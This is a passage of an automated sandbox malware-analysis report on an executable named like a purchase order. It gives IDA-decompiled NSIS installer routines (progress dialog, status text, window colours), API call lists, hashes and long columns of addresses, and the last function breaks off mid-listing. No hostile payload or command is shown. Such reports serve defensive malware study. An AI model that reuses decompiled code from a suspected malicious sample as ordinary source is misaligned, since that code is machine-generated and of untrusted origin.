                                                                      0x00406646
                                                                      0x0040664f
                                                                      0x00406666
                                                                      0x00406666
                                                                      0x0040666d
                                                                      0x00406679
                                                                      0x00406679
                                                                      0x0040667c
                                                                      0x0040667f
                                                                      0x00406684
                                                                      0x00406686
                                                                      0x0040668f
                                                                      0x00406693
                                                                      0x004066b0
                                                                      0x004066b8
                                                                      0x004066b8
                                                                      0x004066bd
                                                                      0x004066bf
                                                                      0x004066c2
                                                                      0x004066c7
                                                                      0x004066c8
                                                                      0x004066cc
                                                                      0x004066cc
                                                                      0x004066cd
                                                                      0x004066d4
                                                                      0x004066d6
                                                                      0x004066dd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066e5
                                                                      0x004066eb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066eb
                                                                      0x004066f0

                                                                      APIs
                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO No. 3200005919.exe",00403464,C:\Users\user\AppData\Local\Temp\,75703420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO No. 3200005919.exe",00403464,C:\Users\user\AppData\Local\Temp\,75703420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO No. 3200005919.exe",00403464,C:\Users\user\AppData\Local\Temp\,75703420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\user\Desktop\PO No. 3200005919.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-574859993
                                                                      • Opcode ID: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                                      • Instruction ID: 91382b34e261ab6a6b837a41ec70345278d3faa82d58aea2d88f3062b19e38b1
                                                                      • Opcode Fuzzy Hash: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                                      • Instruction Fuzzy Hash: 8C11E61580070295DB302B149C40E7766B8EF587A4F12483FED86B32C0E77E4CD286AD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004043AC(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                      				struct tagLOGBRUSH _v16;
                                                                      				long _t35;
                                                                      				long _t37;
                                                                      				void* _t40;
                                                                      				long* _t49;
                                                                      
                                                                      				if(_a4 + 0xfffffecd > 5) {
                                                                      					L15:
                                                                      					return 0;
                                                                      				}
                                                                      				_t49 = GetWindowLongW(_a12, 0xffffffeb);
                                                                      				if(_t49 == 0) {
                                                                      					goto L15;
                                                                      				}
                                                                      				_t35 =  *_t49;
                                                                      				if((_t49[5] & 0x00000002) != 0) {
                                                                      					_t35 = GetSysColor(_t35);
                                                                      				}
                                                                      				if((_t49[5] & 0x00000001) != 0) {
                                                                      					SetTextColor(_a8, _t35);
                                                                      				}
                                                                      				SetBkMode(_a8, _t49[4]);
                                                                      				_t37 = _t49[1];
                                                                      				_v16.lbColor = _t37;
                                                                      				if((_t49[5] & 0x00000008) != 0) {
                                                                      					_t37 = GetSysColor(_t37);
                                                                      					_v16.lbColor = _t37;
                                                                      				}
                                                                      				if((_t49[5] & 0x00000004) != 0) {
                                                                      					SetBkColor(_a8, _t37);
                                                                      				}
                                                                      				if((_t49[5] & 0x00000010) != 0) {
                                                                      					_v16.lbStyle = _t49[2];
                                                                      					_t40 = _t49[3];
                                                                      					if(_t40 != 0) {
                                                                      						DeleteObject(_t40);
                                                                      					}
                                                                      					_t49[3] = CreateBrushIndirect( &_v16);
                                                                      				}
                                                                      				return _t49[3];
                                                                      			}








                                                                      0x004043be
                                                                      0x00404452
                                                                      0x00000000
                                                                      0x00404452
                                                                      0x004043cf
                                                                      0x004043d3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004043d9
                                                                      0x004043e2
                                                                      0x004043e5
                                                                      0x004043e5
                                                                      0x004043eb
                                                                      0x004043f1
                                                                      0x004043f1
                                                                      0x004043fd
                                                                      0x00404403
                                                                      0x0040440a
                                                                      0x0040440d
                                                                      0x00404410
                                                                      0x00404412
                                                                      0x00404412
                                                                      0x0040441a
                                                                      0x00404420
                                                                      0x00404420
                                                                      0x0040442a
                                                                      0x0040442f
                                                                      0x00404432
                                                                      0x00404437
                                                                      0x0040443a
                                                                      0x0040443a
                                                                      0x0040444a
                                                                      0x0040444a
                                                                      0x00000000

                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004043C9
                                                                      • GetSysColor.USER32(00000000), ref: 004043E5
                                                                      • SetTextColor.GDI32(?,00000000), ref: 004043F1
                                                                      • SetBkMode.GDI32(?,?), ref: 004043FD
                                                                      • GetSysColor.USER32(?), ref: 00404410
                                                                      • SetBkColor.GDI32(?,?), ref: 00404420
                                                                      • DeleteObject.GDI32(?), ref: 0040443A
                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404444
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                      • Instruction ID: 701ae6dfa2b2a9365c03cf2c9b1b76f0db24f0feb35c46e7544c905291b2d973
                                                                      • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                      • Instruction Fuzzy Hash: 4B216671500704AFCB219F68DE48B5BBBF8AF81714F04893EED95E22A1D774E944CB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00405414(signed int _a4, WCHAR* _a8) {
                                                                      				struct HWND__* _v8;
                                                                      				signed int _v12;
                                                                      				WCHAR* _v32;
                                                                      				long _v44;
                                                                      				int _v48;
                                                                      				void* _v52;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				WCHAR* _t27;
                                                                      				signed int _t28;
                                                                      				long _t29;
                                                                      				signed int _t37;
                                                                      				signed int _t38;
                                                                      
                                                                      				_t27 =  *0x429224;
                                                                      				_v8 = _t27;
                                                                      				if(_t27 != 0) {
                                                                      					_t37 =  *0x42a314;
                                                                      					_v12 = _t37;
                                                                      					_t38 = _t37 & 0x00000001;
                                                                      					if(_t38 == 0) {
                                                                      						E004063D2(_t38, 0, 0x422708, 0x422708, _a4);
                                                                      					}
                                                                      					_t27 = lstrlenW(0x422708);
                                                                      					_a4 = _t27;
                                                                      					if(_a8 == 0) {
                                                                      						L6:
                                                                      						if((_v12 & 0x00000004) == 0) {
                                                                      							_t27 = SetWindowTextW( *0x429208, 0x422708);
                                                                      						}
                                                                      						if((_v12 & 0x00000002) == 0) {
                                                                      							_v32 = 0x422708;
                                                                      							_v52 = 1;
                                                                      							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                                      							_v44 = 0;
                                                                      							_v48 = _t29 - _t38;
                                                                      							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                                                      							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                                      						}
                                                                      						if(_t38 != 0) {
                                                                      							_t28 = _a4;
                                                                      							0x422708[_t28] = 0;
                                                                      							return _t28;
                                                                      						}
                                                                      					} else {
                                                                      						_t27 = lstrlenW(_a8) + _a4;
                                                                      						if(_t27 < 0x1000) {
                                                                      							_t27 = lstrcatW(0x422708, _a8);
                                                                      							goto L6;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t27;
                                                                      			}

















                                                                      0x0040541a
                                                                      0x00405424
                                                                      0x00405429
                                                                      0x0040542f
                                                                      0x0040543a
                                                                      0x0040543d
                                                                      0x00405440
                                                                      0x00405446
                                                                      0x00405446
                                                                      0x0040544c
                                                                      0x00405454
                                                                      0x00405457
                                                                      0x00405474
                                                                      0x00405478
                                                                      0x00405481
                                                                      0x00405481
                                                                      0x0040548b
                                                                      0x00405494
                                                                      0x004054a0
                                                                      0x004054a7
                                                                      0x004054ab
                                                                      0x004054ae
                                                                      0x004054c1
                                                                      0x004054cf
                                                                      0x004054cf
                                                                      0x004054d3
                                                                      0x004054d5
                                                                      0x004054d8
                                                                      0x00000000
                                                                      0x004054d8
                                                                      0x00405459
                                                                      0x00405461
                                                                      0x00405469
                                                                      0x0040546f
                                                                      0x00000000
                                                                      0x0040546f
                                                                      0x00405469
                                                                      0x00405457
                                                                      0x004054e4

                                                                      APIs
                                                                      • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                      • lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                      • lstrcatW.KERNEL32(00422708,00402EEC), ref: 0040546F
                                                                      • SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 2531174081-0
                                                                      • Opcode ID: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                      • Instruction ID: b4c9d1203d7b93b364d12d55a96473d81469f1a16e33619bfa53f57c996d0385
                                                                      • Opcode Fuzzy Hash: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                      • Instruction Fuzzy Hash: 0E219071900518BACF119FA5DD85ADFBFB4EF45364F10803AF904B62A0C3794A90CFA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00402E72(intOrPtr _a4) {
                                                                      				short _v132;
                                                                      				long _t6;
                                                                      				struct HWND__* _t7;
                                                                      				struct HWND__* _t15;
                                                                      
                                                                      				if(_a4 != 0) {
                                                                      					_t15 =  *0x418edc; // 0x0
                                                                      					if(_t15 != 0) {
                                                                      						_t15 = DestroyWindow(_t15);
                                                                      					}
                                                                      					 *0x418edc = 0;
                                                                      					return _t15;
                                                                      				}
                                                                      				__eflags =  *0x418edc; // 0x0
                                                                      				if(__eflags != 0) {
                                                                      					return E004067C6(0);
                                                                      				}
                                                                      				_t6 = GetTickCount();
                                                                      				__eflags = _t6 -  *0x42a250;
                                                                      				if(_t6 >  *0x42a250) {
                                                                      					__eflags =  *0x42a248;
                                                                      					if( *0x42a248 == 0) {
                                                                      						_t7 = CreateDialogParamW( *0x42a240, 0x6f, 0, E00402DD7, 0);
                                                                      						 *0x418edc = _t7;
                                                                      						return ShowWindow(_t7, 5);
                                                                      					}
                                                                      					__eflags =  *0x42a314 & 0x00000001;
                                                                      					if(( *0x42a314 & 0x00000001) != 0) {
                                                                      						wsprintfW( &_v132, L"... %d%%", E00402E56());
                                                                      						return E00405414(0,  &_v132);
                                                                      					}
                                                                      				}
                                                                      				return _t6;
                                                                      			}







                                                                      0x00402e81
                                                                      0x00402e83
                                                                      0x00402e8a
                                                                      0x00402e8d
                                                                      0x00402e8d
                                                                      0x00402e93
                                                                      0x00000000
                                                                      0x00402e93
                                                                      0x00402e9b
                                                                      0x00402ea1
                                                                      0x00000000
                                                                      0x00402ea4
                                                                      0x00402eab
                                                                      0x00402eb1
                                                                      0x00402eb7
                                                                      0x00402eb9
                                                                      0x00402ebf
                                                                      0x00402efd
                                                                      0x00402f06
                                                                      0x00000000
                                                                      0x00402f0b
                                                                      0x00402ec1
                                                                      0x00402ec8
                                                                      0x00402ed9
                                                                      0x00000000
                                                                      0x00402ee7
                                                                      0x00402ec8
                                                                      0x00402f13

                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402E8D
                                                                      • GetTickCount.KERNEL32 ref: 00402EAB
                                                                      • wsprintfW.USER32 ref: 00402ED9
                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC), ref: 0040546F
                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EFD
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402F0B
                                                                        • Part of subcall function 00402E56: MulDiv.KERNEL32(00013C17,00000064,000153AC), ref: 00402E6B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                      • String ID: ... %d%%
                                                                      • API String ID: 722711167-2449383134
                                                                      • Opcode ID: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                                      • Instruction ID: c2ec4548d439a14d597b05689786213ff5532ac021c242b5895b0761ec4a5705
                                                                      • Opcode Fuzzy Hash: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                                      • Instruction Fuzzy Hash: 0501C430440724EBCB31AB60EF4CB9B7B68AB00B44B50417FF945F12E0CAB844558BEE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00404CDE(struct HWND__* _a4, intOrPtr _a8) {
                                                                      				long _v8;
                                                                      				signed char _v12;
                                                                      				unsigned int _v16;
                                                                      				void* _v20;
                                                                      				intOrPtr _v24;
                                                                      				long _v56;
                                                                      				void* _v60;
                                                                      				long _t15;
                                                                      				unsigned int _t19;
                                                                      				signed int _t25;
                                                                      				struct HWND__* _t28;
                                                                      
                                                                      				_t28 = _a4;
                                                                      				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                      				if(_a8 == 0) {
                                                                      					L4:
                                                                      					_v56 = _t15;
                                                                      					_v60 = 4;
                                                                      					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                      					return _v24;
                                                                      				}
                                                                      				_t19 = GetMessagePos();
                                                                      				_v16 = _t19 >> 0x10;
                                                                      				_v20 = _t19;
                                                                      				ScreenToClient(_t28,  &_v20);
                                                                      				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                      				if((_v12 & 0x00000066) != 0) {
                                                                      					_t15 = _v8;
                                                                      					goto L4;
                                                                      				}
                                                                      				return _t25 | 0xffffffff;
                                                                      			}














                                                                      0x00404cec
                                                                      0x00404cf9
                                                                      0x00404cff
                                                                      0x00404d3d
                                                                      0x00404d3d
                                                                      0x00404d4c
                                                                      0x00404d53
                                                                      0x00000000
                                                                      0x00404d55
                                                                      0x00404d01
                                                                      0x00404d10
                                                                      0x00404d18
                                                                      0x00404d1b
                                                                      0x00404d2d
                                                                      0x00404d33
                                                                      0x00404d3a
                                                                      0x00000000
                                                                      0x00404d3a
                                                                      0x00000000

                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404CF9
                                                                      • GetMessagePos.USER32 ref: 00404D01
                                                                      • ScreenToClient.USER32(?,?), ref: 00404D1B
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D2D
                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D53
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                      • Instruction ID: b067d4b0ecc7c77c1c3f0caef97ada8ed48413e9bef28a1d47140c0a876cf8aa
                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                      • Instruction Fuzzy Hash: AD015E71A0021DBADB00DB94DD85BFEBBBCAF95715F10412BBA50B62D0C7B899018BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
                                                                      				short _v132;
                                                                      				void* _t11;
                                                                      				WCHAR* _t19;
                                                                      
                                                                      				if(_a8 == 0x110) {
                                                                      					SetTimer(_a4, 1, 0xfa, 0);
                                                                      					_a8 = 0x113;
                                                                      				}
                                                                      				if(_a8 == 0x113) {
                                                                      					_t11 = E00402E56();
                                                                      					_t19 = L"unpacking data: %d%%";
                                                                      					if( *0x42a254 == 0) {
                                                                      						_t19 = L"verifying installer: %d%%";
                                                                      					}
                                                                      					wsprintfW( &_v132, _t19, _t11);
                                                                      					SetWindowTextW(_a4,  &_v132);
                                                                      					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                      				}
                                                                      				return 0;
                                                                      			}






                                                                      0x00402de7
                                                                      0x00402df5
                                                                      0x00402dfb
                                                                      0x00402dfb
                                                                      0x00402e09
                                                                      0x00402e0b
                                                                      0x00402e17
                                                                      0x00402e1c
                                                                      0x00402e1e
                                                                      0x00402e1e
                                                                      0x00402e29
                                                                      0x00402e39
                                                                      0x00402e4b
                                                                      0x00402e4b
                                                                      0x00402e53

                                                                      APIs
                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                      • wsprintfW.USER32 ref: 00402E29
                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E39
                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E4B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                      • API String ID: 1451636040-1158693248
                                                                      • Opcode ID: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                      • Instruction ID: 0bc749b122006b2f9f6abad3e9991ed6065550717762caf8ffdc158a825a6066
                                                                      • Opcode Fuzzy Hash: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                      • Instruction Fuzzy Hash: 69F0367154020DABDF206F50DD4ABEA3B69FB00714F00803AFA06B51D0DBFD55598F99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E100024A4(intOrPtr* _a4) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr* _t24;
                                                                      				void* _t26;
                                                                      				intOrPtr _t27;
                                                                      				signed int _t35;
                                                                      				void* _t39;
                                                                      				intOrPtr _t40;
                                                                      				void* _t43;
                                                                      
                                                                      				_t39 = E1000121B();
                                                                      				_t24 = _a4;
                                                                      				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                      				_v4 = _t40;
                                                                      				_t43 = (_t40 + 0x81 << 5) + _t24;
                                                                      				do {
                                                                      					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
                                                                      					}
                                                                      					_t35 =  *(_t43 - 8);
                                                                      					if(_t35 <= 7) {
                                                                      						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
                                                                      							case 0:
                                                                      								 *_t39 =  *_t39 & 0x00000000;
                                                                      								goto L15;
                                                                      							case 1:
                                                                      								_push( *__eax);
                                                                      								goto L13;
                                                                      							case 2:
                                                                      								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                      								goto L14;
                                                                      							case 3:
                                                                      								__ecx =  *0x1000406c;
                                                                      								__edx = __ecx - 1;
                                                                      								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
                                                                      								__eax =  *0x1000406c;
                                                                      								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
                                                                      								goto L15;
                                                                      							case 4:
                                                                      								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
                                                                      								goto L15;
                                                                      							case 5:
                                                                      								_push( *0x1000406c);
                                                                      								_push(__edi);
                                                                      								_push( *__eax);
                                                                      								__imp__StringFromGUID2();
                                                                      								goto L15;
                                                                      							case 6:
                                                                      								_push( *__esi);
                                                                      								L13:
                                                                      								__eax = wsprintfW(__edi, __ebp);
                                                                      								L14:
                                                                      								__esp = __esp + 0xc;
                                                                      								goto L15;
                                                                      						}
                                                                      					}
                                                                      					L15:
                                                                      					_t26 =  *(_t43 + 0x14);
                                                                      					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                      						GlobalFree(_t26);
                                                                      					}
                                                                      					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                      					if(_t27 != 0) {
                                                                      						if(_t27 != 0xffffffff) {
                                                                      							if(_t27 > 0) {
                                                                      								E100012E1(_t27 - 1, _t39);
                                                                      								goto L24;
                                                                      							}
                                                                      						} else {
                                                                      							E10001272(_t39);
                                                                      							L24:
                                                                      						}
                                                                      					}
                                                                      					_v4 = _v4 - 1;
                                                                      					_t43 = _t43 - 0x20;
                                                                      				} while (_v4 >= 0);
                                                                      				return GlobalFree(_t39);
                                                                      			}











                                                                      0x100024ae
                                                                      0x100024b0
                                                                      0x100024bf
                                                                      0x100024c5
                                                                      0x100024d2
                                                                      0x100024d4
                                                                      0x100024d8
                                                                      0x100024d8
                                                                      0x100024e0
                                                                      0x100024e6
                                                                      0x100024e8
                                                                      0x00000000
                                                                      0x100024ef
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100024f5
                                                                      0x00000000
                                                                      0x00000000
